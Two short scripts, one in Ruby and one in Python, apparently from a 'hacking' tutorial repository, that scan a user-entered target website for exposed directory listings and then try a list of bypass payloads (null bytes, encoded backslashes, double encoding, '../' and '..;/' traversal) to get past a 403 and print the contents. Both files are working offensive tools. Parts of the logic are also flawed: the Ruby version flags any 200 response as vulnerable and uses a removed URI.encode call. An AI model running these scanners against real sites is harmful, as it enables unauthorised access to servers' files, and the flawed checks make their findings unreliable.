File: hacking_with_ruby/direcoty_listing.rb
require 'net/http'
require 'uri'
require 'colorize'

def check_directory_listing_vulnerability(url)
  uri = URI.parse(url)
  response = Net::HTTP.get_response(uri)

  case response.code.to_i
  when 200
    puts "[*] Checking for Directory Listing vulnerability on #{url}...".green
    puts "[+] Target is vulnerable to Directory Listing.".red
    puts "[+] Exploit: #{uri}".red
    display_directory_contents(uri)
  when 403
    puts "[*] Checking for Directory Listing vulnerability on #{url}...".green
    puts "[+] Directory Listing is forbidden, attempting to bypass...".yellow
    bypass_directory_listing_protection(url)
  else
    puts "[-] Unable to determine vulnerability status. HTTP status code: #{response.code}".red
  end
end

def bypass_directory_listing_protection(url)
  bypassed = false

  # Techniques to attempt to bypass directory listing protection
  techniques = [
    { name: "Adding trailing slash", method: ->(url) { "#{url}/" } },
    { name: "Appending index file names", method: ->(url) { "#{url}/index.html" } },
    { name: "Using %20 to bypass filters", method: ->(url) { "#{url}%20" } },
    { name: "Using uppercase file extensions", method: ->(url) { "#{url.upcase}" } },
    { name: "Using double URL encoding", method: ->(url) { "#{URI.encode(URI.encode(url))}" } },
    { name: "Using encoded null byte (%00)", method: ->(url) { "#{url.gsub("/", "/%00")}" } },
    { name: "Using encoded backslash (%5C)", method: ->(url) { "#{url.gsub("/", "/%5C")}" } },
    { name: "Using directory traversal (../)", method: ->(url) { "#{url}/../" } },
    { name: "Using encoded character encoding (%25, %2E)", method: ->(url) { "#{url.gsub("/", "/%25")}" } },
    # Add more bypass techniques here
  ]

  techniques.each do |technique|
    bypassed_uri = URI.parse(technique[:method].call(url))
    response = Net::HTTP.get_response(bypassed_uri)

    if response.code.to_i == 200
      puts "[+] Directory Listing protection bypassed using #{technique[:name]}.".red
      puts "[+] Exploit: #{bypassed_uri}".red
      display_directory_contents(bypassed_uri)
      bypassed = true
      break
    end
  end

  puts "[-] Bypass attempt failed.".red unless bypassed
end

def display_directory_contents(uri)
  response = Net::HTTP.get_response(uri)
  puts "Directory contents:".green
  puts response.body
end

def main
  puts "Enter your target website URL: "
  target_url = gets.chomp

  begin
    check_directory_listing_vulnerability(target_url)
  rescue StandardError => e
    puts "[-] An error occurred: #{e.message}".red
  end
end

main

File: hacking_with_python/direcoty_listing.py
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin
from termcolor import colored

def check_directory_listing(url):
    print(colored("[*] Testing for Directory Listing vulnerability on:", "blue"), url)
    response = requests.get(url)
    if response.status_code == 200:
        soup = BeautifulSoup(response.content, 'html.parser')
        links = soup.find_all('a')
        directories = []
        for link in links:
            href = link.get('href')
            if href.endswith('/'):
                directories.append(href)
        if directories:
            print(colored("[+] Directory Listing vulnerability found!", "green"))
            print(colored("[*] Directories found:", "blue"))
            for directory in directories:
                print(colored("\t" + directory, "yellow"))
            return True
        else:
            print(colored("[-] No directories found.", "red"))
            return False
    else:
        print(colored("[-] Error:", "red"), "Failed to access the website.")
        return False

def bypass_protection(url):
    print(colored("[*] Attempting to bypass protection system on:", "blue"), url)
    # Add more techniques to bypass protection systems here
    techniques = [
        "../",              # Try going up one directory level
        "%2e%2e/",         # URL-encoded version of "../"
        "/./",              # Use current directory symbol
        "/../",             # Use backward slash to traverse
        "?path=",           # Use query parameter to access directories
        "#",                # Use fragment identifier
        "//",               # Use double slash to bypass some protections
        "/..;/",            # Use semicolon to try to bypass filtering
        "/..%u2215",        # Use Unicode character for directory traversal
        "/..\\",            # Use backslash to try different directory traversal
        "/.randomstring/",  # Use random string after dot to bypass some filters
        "/.../",            # Use multiple dots to bypass protection
    ]
    for technique in techniques:
        modified_url = urljoin(url, technique)
        response = requests.get(modified_url)
        if response.status_code == 200:
            print(colored("[+] Bypass successful with technique:", "green"), technique)
            print(colored("[*] Exploit:", "blue"), modified_url)
            return
    print(colored("[-] Bypass unsuccessful.", "red"))

if __name__ == "__main__":
    target_website = input(colored("Enter your target website URL: ", "cyan"))
    if target_website.startswith("http://") or target_website.startswith("https://"):
        directory_listing_vulnerable = check_directory_listing(target_website)
        if directory_listing_vulnerable:
            bypass_protection(target_website)
    else:
        print(colored("[-] Invalid URL format.", "red"))
